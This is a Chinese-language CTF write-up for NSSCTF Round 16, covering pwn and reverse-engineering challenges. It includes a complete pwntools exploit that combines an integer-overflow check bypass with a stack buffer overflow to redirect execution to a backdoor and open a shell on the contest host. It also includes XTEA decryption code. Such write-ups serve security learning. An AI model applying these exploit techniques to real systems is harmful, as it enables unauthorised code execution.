nyyyddddn

nssctfr16_wp

ctf writeup
2024/01/26

pwn

nc_pwnre

一个异或的逻辑, 异或后是一串base64编码,提交解码后的文本就进到shell了

1
2
3
4
a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]

for i in a:
    print(chr(i ^ 0x10),end="")
1
TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==

1705130191002

ret_text

1
2
__isoc99_scanf("%d", &v2);
 if ( v2 < 0 && (v2 = -v2, v2 < 0) )

-2147483648 进行 - 运算后会溢出,满足这个if的约束,能走到下边read,read那有一个栈溢出,覆盖返回地址为backdoor就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./ret_text_v0')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "node7.anna.nssctf.cn"
    port = 28070
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])



payload = "-2147483648"

sla("Easy ret2text!!!Input:\n",payload)

payload = b'a' * (0x20 + 0x4) + p32(0x8049328)

sla("OK!!!You are right.\n",payload)

p.interactive()

re

test your Debugger

打个断点去内存里面看一下flag就好了

CompileMe!!!

一眼 xtea,尝试编译了一下发现爆内存 vs崩溃了,有一个new ZZZ()的操作跟了一下,发现爆内存的原因是调用栈 栈帧太多了,写一个class zzz,然后再写一个getval的方法,直接把val计算出来就好了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
internal class Program
{
    static void Main(string[] args)
    {
        var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
        var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
        const ulong ___ = 0x9E3779B9;
        var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();

        var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
            .GroupBy(____________ => ____________.Index / 2)
            .Select(___________ =>
            {
                ulong _________ = ___________.ElementAt(0).Value;
                ulong __________ = ___________.ElementAt(1).Value;
                ulong _____________ = ___ * 32;

                ____.ToList().ForEach(_____________________ =>
                {
                    __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
                    _____________ -= ___;
                    _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
                });
                return new[] { _________, __________ };
            })
            .SelectMany(______________ => ______________)
            .ToArray();

        Array.Copy(_____, __, __.Length);

        __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
        //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
        //Try to compile me!!!
    }
}

一些文本处理的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# import re

# code = """
# //NET8.0
# 
# 
# namespace NSSCTF
# {
#     internal class Program
#     {
#         static void Main(string[] args)
#         {
#             var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
#             var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
#             const ulong ___ = 0x9E3779B9;
#             var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
# 
#             var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
#                 .GroupBy(____________ => ____________.Index / 2)
#                 .Select(___________ =>
#                 {
#                     ulong _________ = ___________.ElementAt(0).Value;
#                     ulong __________ = ___________.ElementAt(1).Value;
#                     ulong _____________ = ___ * 32;
# 
#                     ____.ToList().ForEach(_____________________ =>
#                     {
#                         __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
#                         _____________ -= ___;
#                         _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
#                     });
#                     return new[] { _________, __________ };
#                 })
#                 .SelectMany(______________ => ______________)
#                 .ToArray();
# 
#             Array.Copy(_____, __, __.Length);
# 
#             __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
#             //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
#             //Try to compile me!!!
#                .......
#         }
#     }
# 
#     abstract class _(ulong val)
#     {
#         public abstract ulong GetVal();
#     }
# 
#     class A(ulong val) : _(val)
#     {
#         public override ulong GetVal()
#         {
#             return val + 0x79013C0BD7467DC;
#         }
#     }
# 
#     class B(ulong val) : A(val)
#     {
#         public override ulong GetVal()
#         {
#             base.GetVal();
#             return val - 0x78D23D50E23FC98;
#         }
#     }
# 
#     class C(ulong val) : B(val)
#     {
# """
# regex = r"return\s+val\s+([+-^])\s+(0x[a-fA-F0-9]+);"

# matches = re.findall(regex, code)
# 
# for i in matches:
#     print(i)
# 


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# data = """
# + 0x79013C0BD7467DC
# - 0x78D23D50E23FC98
# ^ 0x7E83D35728928CB
# - 0x4901E49CF9D63E8
# ^ 0x664DCA766EBA177
# + 0x7532EA705E8D596
# - 0x703A7337269BDED
# ^ 0x6FD783765C32290
# - 0x5A443D7480A09F7
# 
#...... 
# """
# 
# processed_data = ""
# for line in data.strip().split('\n'):
#     operator, number = line.split(' ')
#     processed_line = f"value {operator}= {number};\n"
#     print("            " + processed_line)

执行后得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
using System.Reflection.Metadata.Ecma335;
using System.Text;
namespace NSSCTF
{
    internal class Program
    {
        static void Main(string[] args)
        {
            var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
            var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
            const ulong ___ = 0x9E3779B9;
            var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();

            var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
                .GroupBy(____________ => ____________.Index / 2)
                .Select(___________ =>
                {
                    ulong _________ = ___________.ElementAt(0).Value;
                    ulong __________ = ___________.ElementAt(1).Value;
                    ulong _____________ = ___ * 32;

                    ____.ToList().ForEach(_____________________ =>
                    {
                        __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
                        _____________ -= ___;
                        _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
                    });
                    return new[] { _________, __________ };
                })
                .SelectMany(______________ => ______________)
                .ToArray();

            Array.Copy(_____, __, __.Length);

            __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
            //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
            //Try to compile me!!!
        }
    }
    class ZZZ(ulong val)
    {
        ulong value = val;
        public ulong GetVal()
        {
            value += 0x79013C0BD7467DC;

            value -= 0x78D23D50E23FC98;

            value ^= 0x7E83D35728928CB;

            value -= 0x4901E49CF9D63E8;

            value ^= 0x664DCA766EBA177;

            value += 0x7532EA705E8D596;

            value -= 0x703A7337269BDED;
            ......
        }
    }
}

Author:nyyyddddn

Link:https://nyyyddddn.github.io/2024/01/26/nssctfr16-wp/

Publish date:January 26th 2024, 4:04:37 pm

Update date:January 26th 2024, 6:01:43 pm

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. pwn
    1. 1.1. nc_pwnre
    2. 1.2. ret_text
  2. 2. re
    1. 2.1. test your Debugger
    2. 2.2. CompileMe!!!
Total : 59
2024
2023
Invalid date
2023
ctf writeup misc